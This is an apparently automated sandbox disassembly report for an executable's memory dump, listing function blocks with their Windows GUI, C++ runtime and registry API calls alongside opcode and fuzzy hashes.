                                                              • API ID: LockitLockit::_std::_$Exception@8Throwstd::bad_exception::bad_exception
                                                              • String ID: h*b
                                                              • API String ID: 2513498551-3147924297
                                                              • Opcode ID: 64fba683b71f4f0603b7557daaed3466852c98166affa515a59b130502ecc2e8
                                                              • Instruction ID: ee1d1a4f6322fcae045fb66e433cf026cf6fbf690344fd797f4a2681fe0b41cf
                                                              • Opcode Fuzzy Hash: 64fba683b71f4f0603b7557daaed3466852c98166affa515a59b130502ecc2e8
                                                              • Instruction Fuzzy Hash: 6E31BF759442069FDB28DF54C855BAEBBB4FB01320F51461BEC55A73A1EB34AD00CBA1
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 004D66DC
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 004D66FF
                                                              • std::bad_exception::bad_exception.LIBCMT ref: 004D6780
                                                              • __CxxThrowException@8.LIBCMT ref: 004D678E
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 004D67A1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: LockitLockit::_std::_$Exception@8Throwstd::bad_exception::bad_exception
                                                              • String ID: bad cast
                                                              • API String ID: 2513498551-3145022300
                                                              • Opcode ID: a3098c54ae74af654b1121707ae001855633429a03f93a6bafff14ed59be4b5c
                                                              • Instruction ID: b1fb5adf81e5397d0be18dbe076b67a67e15c4301565ed9f600e3ed13f88b3e5
                                                              • Opcode Fuzzy Hash: a3098c54ae74af654b1121707ae001855633429a03f93a6bafff14ed59be4b5c
                                                              • Instruction Fuzzy Hash: 4131DF3580020A9FDF24DF64C995BAE77B4FB05328F52066BE426A73D1DB346D04CB91
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 004D698C
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 004D69AF
                                                              • std::bad_exception::bad_exception.LIBCMT ref: 004D6A30
                                                              • __CxxThrowException@8.LIBCMT ref: 004D6A3E
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 004D6A51
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: LockitLockit::_std::_$Exception@8Throwstd::bad_exception::bad_exception
                                                              • String ID: bad cast
                                                              • API String ID: 2513498551-3145022300
                                                              • Opcode ID: ded14a1cbc6c693a28a01a37a025cc13ea666c006577be1eefbea97136ebced8
                                                              • Instruction ID: c81e39db27d27d253f4f1524f34dc484b7ca0977107661a914f8f8b39eb49773
                                                              • Opcode Fuzzy Hash: ded14a1cbc6c693a28a01a37a025cc13ea666c006577be1eefbea97136ebced8
                                                              • Instruction Fuzzy Hash: 4831FF719002068FCB24DF64C895BAFB7B4FB06320F12421BE4A6B7391DB34AD00CB95
                                                              APIs
                                                              • std::_Xinvalid_argument.LIBCPMT ref: 004D6328
                                                                • Part of subcall function 005E858E: std::exception::exception.LIBCMT ref: 005E85A3
                                                                • Part of subcall function 005E858E: __CxxThrowException@8.LIBCMT ref: 005E85B8
                                                                • Part of subcall function 005E858E: std::exception::exception.LIBCMT ref: 005E85C9
                                                              • std::_Xinvalid_argument.LIBCPMT ref: 004D6346
                                                              • std::_Xinvalid_argument.LIBCPMT ref: 004D6361
                                                              • _memmove.LIBCMT ref: 004D63C5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
                                                              • String ID: invalid string position$string too long
                                                              • API String ID: 443534600-4289949731
                                                              • Opcode ID: ac8dae6a3aa9405e9a024f7f75b6378f98687adc82f42c3c3c608be470624d81
                                                              • Instruction ID: 2527ca54307cd054b837361b95be8d8f7878173d368be9deb23e8237d3f9cb85
                                                              • Opcode Fuzzy Hash: ac8dae6a3aa9405e9a024f7f75b6378f98687adc82f42c3c3c608be470624d81
                                                              • Instruction Fuzzy Hash: 3721E6313007015FC724DE6CE8A0A2AF7E6BB95710B214A2FF896CB781D775D8408764
                                                              APIs
                                                              • std::_Xinvalid_argument.LIBCPMT ref: 004D601F
                                                                • Part of subcall function 005E858E: std::exception::exception.LIBCMT ref: 005E85A3
                                                                • Part of subcall function 005E858E: __CxxThrowException@8.LIBCMT ref: 005E85B8
                                                                • Part of subcall function 005E858E: std::exception::exception.LIBCMT ref: 005E85C9
                                                              • std::_Xinvalid_argument.LIBCPMT ref: 004D6035
                                                              • std::_Xinvalid_argument.LIBCPMT ref: 004D6050
                                                              • _memmove.LIBCMT ref: 004D60B2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
                                                              • String ID: invalid string position$string too long
                                                              • API String ID: 443534600-4289949731
                                                              • Opcode ID: fb630cf44cda6ba097b75cca38aaac97dec87d0287985cbc73f6d5c125644abe
                                                              • Instruction ID: be153347c01deede381d9918e7bbeecd4497d373db86e392e2f338fc0084b9ba
                                                              • Opcode Fuzzy Hash: fb630cf44cda6ba097b75cca38aaac97dec87d0287985cbc73f6d5c125644abe
                                                              • Instruction Fuzzy Hash: 022127303102105FD736DE6CD8A4A2EB7EAAF92700B51491FF482CB781CB65EC44C7A8
                                                              APIs
                                                                • Part of subcall function 004F06C8: IsIconic.USER32(?), ref: 004F06E8
                                                              • GetWindowRect.USER32(?,?), ref: 004F10C6
                                                                • Part of subcall function 004E011B: ScreenToClient.USER32(?,?), ref: 004E012C
                                                                • Part of subcall function 004E011B: ScreenToClient.USER32(?,?), ref: 004E0139
                                                                • Part of subcall function 004F0CBE: __EH_prolog3_GS.LIBCMT ref: 004F0CC8
                                                                • Part of subcall function 004F0CBE: GetWindowRect.USER32(?,?), ref: 004F0D17
                                                                • Part of subcall function 004F0CBE: OffsetRect.USER32(?,?,?), ref: 004F0D2D
                                                                • Part of subcall function 004F0CBE: CreateCompatibleDC.GDI32(?), ref: 004F0D9E
                                                                • Part of subcall function 004F0CBE: SelectObject.GDI32(?,?), ref: 004F0DBE
                                                              • GetModuleHandleW.KERNEL32(DWMAPI), ref: 004F10FE
                                                              • GetProcAddress.KERNEL32(00000000,DwmSetIconicLivePreviewBitmap), ref: 004F110E
                                                              • DeleteObject.GDI32(00000000), ref: 004F1125
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$ClientObjectScreenWindow$AddressCompatibleCreateDeleteH_prolog3_HandleIconicModuleOffsetProcSelect
                                                              • String ID: DWMAPI$DwmSetIconicLivePreviewBitmap
                                                              • API String ID: 3205686482-239049650
                                                              • Opcode ID: d89b3d21d03bf2c22720cb660be54d1af21e3d48c0fbff0666d05fc65324ee64
                                                              • Instruction ID: fbf01b2cbafaa89f3bd6c4d71202782531a73e8e444d075726f05440e21e450d
                                                              • Opcode Fuzzy Hash: d89b3d21d03bf2c22720cb660be54d1af21e3d48c0fbff0666d05fc65324ee64
                                                              • Instruction Fuzzy Hash: 8B314F71A00209DF8B04DFA9D9858BFFBF9FF98704710456EE212E3261DA786941CB54
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Capture$Release$CursorMessageMetricsParentSendSystem
                                                              • String ID:
                                                              • API String ID: 237134002-0
                                                              • Opcode ID: b4c7590d6cc20f58feb1008f5747a3bdc414ca7a07c4326e20350769fbe03623
                                                              • Instruction ID: 93f5d166a242fdc6c6f85cdbf5a46a38cec3968b97044065d3ccebfb99c66233
                                                              • Opcode Fuzzy Hash: b4c7590d6cc20f58feb1008f5747a3bdc414ca7a07c4326e20350769fbe03623
                                                              • Instruction Fuzzy Hash: 80319AB1900619EFCF21AFA8DC889AEBFB5FF48341F10492EF41686260DB349950DB54
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 005B8A49
                                                                • Part of subcall function 005A7DE9: __EH_prolog3.LIBCMT ref: 005A7DF0
                                                                • Part of subcall function 005C9306: __EH_prolog3.LIBCMT ref: 005C930D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: X*b$dF`$dI`$dI`$G`
                                                              • API String ID: 431132790-2979339354
                                                              • Opcode ID: 6a22bc849f15044b398e3e5793a7f4f287322e2b90459a85bbc747175957808f
                                                              • Instruction ID: 6fec9dc0ca425a784dfadc4f4a92c70e521b7a40b7d98126d8895a7aff1e7c04
                                                              • Opcode Fuzzy Hash: 6a22bc849f15044b398e3e5793a7f4f287322e2b90459a85bbc747175957808f
                                                              • Instruction Fuzzy Hash: EC418EB0405B84DFCB61EF75C1557DBBBE4AF25308F10485EA6AE57282DF742608CB1A
                                                              APIs
                                                              • LockWindowUpdate.USER32(00000000,00000000,?,?,?,0058571B,00000000), ref: 005104E6
                                                              • ValidateRect.USER32(?,00000000,?,?,0058571B,00000000), ref: 0051051B
                                                              • UpdateWindow.USER32(?), ref: 00510520
                                                              • LockWindowUpdate.USER32(00000000,?,0058571B,00000000), ref: 00510533
                                                              • ValidateRect.USER32(?,00000000,?,?,0058571B,00000000), ref: 0051055A
                                                              • UpdateWindow.USER32(?), ref: 0051055F
                                                              • LockWindowUpdate.USER32(00000000,?,0058571B,00000000), ref: 00510572
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: UpdateWindow$Lock$RectValidate
                                                              • String ID:
                                                              • API String ID: 797752328-0
                                                              • Opcode ID: e516c8889273a7014ed52f79dd6cdbf36ef049e6c9d4d3ec61fcd4ec1bb16fcb
                                                              • Instruction ID: cbed3fb68b446fb4de78dfcd0e3205ec3fd2b05a91312718f0f4553b6581c9d5
                                                              • Opcode Fuzzy Hash: e516c8889273a7014ed52f79dd6cdbf36ef049e6c9d4d3ec61fcd4ec1bb16fcb
                                                              • Instruction Fuzzy Hash: BF217132600100EBEB255F54D884BB9BBB2FF44750F2A5119E549AB6A0D7B1ACD0EF90
                                                              APIs
                                                              • SetFocus.USER32(00000000,00000000), ref: 00518483
                                                              • GetParent.USER32(?), ref: 00518491
                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 005184AC
                                                              • GetCurrentProcessId.KERNEL32 ref: 005184B2
                                                              • GetActiveWindow.USER32 ref: 00518505
                                                              • SendMessageW.USER32(?,00000006,00000001,00000000), ref: 00518519
                                                              • SendMessageW.USER32(?,00000086,00000001,00000000), ref: 0051852D
                                                                • Part of subcall function 004ECD97: EnableWindow.USER32(?,?), ref: 004ECDA8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageProcessSend$ActiveCurrentEnableFocusParentThread
                                                              • String ID:
                                                              • API String ID: 2169720751-0
                                                              • Opcode ID: 610d2da1802b0c18f85b89e00dbc9d3faef3792081acf75a91444fd186fe4c3b
                                                              • Instruction ID: a1ccb50598dc7a1b84c55efe7e11b5996e19704a824695c2d411735f8f376d09
                                                              • Opcode Fuzzy Hash: 610d2da1802b0c18f85b89e00dbc9d3faef3792081acf75a91444fd186fe4c3b
                                                              • Instruction Fuzzy Hash: AE21D131200704ABEB31AF25DCC8BBA7FA6FB54754F254918F586C61A0DFB5A8C08B50
                                                              APIs
                                                              • IsWindow.USER32(?), ref: 00522AC5
                                                              • SendMessageW.USER32(?,0000020A,?,?), ref: 00522AF7
                                                              • GetFocus.USER32 ref: 00522B0B
                                                              • IsChild.USER32(?,?), ref: 00522B2D
                                                              • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00522B5E
                                                              • IsWindowVisible.USER32(?), ref: 00522B73
                                                              • SendMessageW.USER32(?,0000020A,?,?), ref: 00522B91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$ChildFocusVisible
                                                              • String ID:
                                                              • API String ID: 1252167185-0
                                                              • Opcode ID: 4501784149dd81b8705431fb914b520c469a7953fee95f5cf223d07ef0d9a22d
                                                              • Instruction ID: be02cb2f01c674417ef5c07b4338d357859fc97fef3042a1cfa76488d88fd432
                                                              • Opcode Fuzzy Hash: 4501784149dd81b8705431fb914b520c469a7953fee95f5cf223d07ef0d9a22d
                                                              • Instruction Fuzzy Hash: 3A217C7A600222ABDB209F25EC44F367BA6FF0A701F064568F845DB1B0DB32EC00EB41
                                                              APIs
                                                              • RegOpenKeyExW.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 004E41DF
                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 004E420A
                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 004E4235
                                                              • RegCloseKey.ADVAPI32(?), ref: 004E4249
                                                              • RegCloseKey.ADVAPI32(?), ref: 004E4253
                                                                • Part of subcall function 004E17E4: GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 004E17F6
                                                                • Part of subcall function 004E17E4: GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 004E1806
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: CloseCreate$AddressHandleModuleOpenProc
                                                              • String ID: software
                                                              • API String ID: 550756860-2010147023
                                                              • Opcode ID: 60d468f10dace7fa5c25a695e479b30679ce0229670945f012316b75c5e41820
                                                              • Instruction ID: a9b6f2e0b48fcc69fae1e00207791962e432719219ff7065f4d76a399a43df0f
                                                              • Opcode Fuzzy Hash: 60d468f10dace7fa5c25a695e479b30679ce0229670945f012316b75c5e41820
                                                              • Instruction Fuzzy Hash: F8213A71900088FB8B219BD6CC88CBFBF7DEFD5741B64009BF605A2111DB355A45DB65
                                                              APIs
                                                              • FillRect.USER32(?,?), ref: 005024F0
                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 005024FE
                                                              • PatBlt.GDI32(?,?,?,00000001,?,005A0049), ref: 0050252A
                                                              • PatBlt.GDI32(?,?,?,?,00000001,005A0049), ref: 0050253F
                                                              • PatBlt.GDI32(?,00000000,?,00000001,?,005A0049), ref: 00502554
                                                              • PatBlt.GDI32(?,?,?,00000000,00000001,005A0049), ref: 0050256A
                                                              • FillRect.USER32(?,?), ref: 0050257F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$Fill$Inflate
                                                              • String ID:
                                                              • API String ID: 2224923502-0
                                                              • Opcode ID: 9a78c4586fd4c81e537e87870b26c4880230e11ca469cfc92e10b429de65db9e
                                                              • Instruction ID: 734029f621701f5084b12adbc99cac142a48e194e9ab6188c58d7843fda2f9e0
                                                              • Opcode Fuzzy Hash: 9a78c4586fd4c81e537e87870b26c4880230e11ca469cfc92e10b429de65db9e
                                                              • Instruction Fuzzy Hash: 8521FA75100119FFDF01CF58DD89EAA7FAAFB49720F048115BD149A2A0C771E964DF60
                                                              APIs
                                                              • GetParent.USER32(?), ref: 004E6F8D
                                                              • GetWindowRect.USER32(?,?), ref: 004E6FB1
                                                              • ScreenToClient.USER32(?,?), ref: 004E6FC4
                                                              • ScreenToClient.USER32(?,?), ref: 004E6FCD
                                                              • EqualRect.USER32(?,?), ref: 004E6FD4
                                                              • DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 004E6FFE
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 004E7008
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$ClientRectScreen$DeferEqualParent
                                                              • String ID:
                                                              • API String ID: 443303494-0
                                                              • Opcode ID: 6f75f59bcf3e0e73d424accb873c6f5141ea14b78f30c2d4c0fe2ab0611f9855
                                                              • Instruction ID: 5c609c788672388aae99663a84e1b1c74e5f52cd00f5a3db011217d71a1e1b2a
                                                              • Opcode Fuzzy Hash: 6f75f59bcf3e0e73d424accb873c6f5141ea14b78f30c2d4c0fe2ab0611f9855
                                                              • Instruction Fuzzy Hash: B321217590020AAFDB10DFA5DC84DBFBBB9FF98311B20842AE915E3250DB34A904DF60
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000407,00000000,?), ref: 0051EFEC
                                                              • IsRectEmpty.USER32(?), ref: 0051F00B
                                                              • IsRectEmpty.USER32(?), ref: 0051F018
                                                              • GetCursorPos.USER32(00000000), ref: 0051F02A
                                                              • ScreenToClient.USER32(?,00000000), ref: 0051F037
                                                              • PtInRect.USER32(?,00000000,00000000), ref: 0051F04A
                                                              • PtInRect.USER32(?,00000000,00000000), ref: 0051F05D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
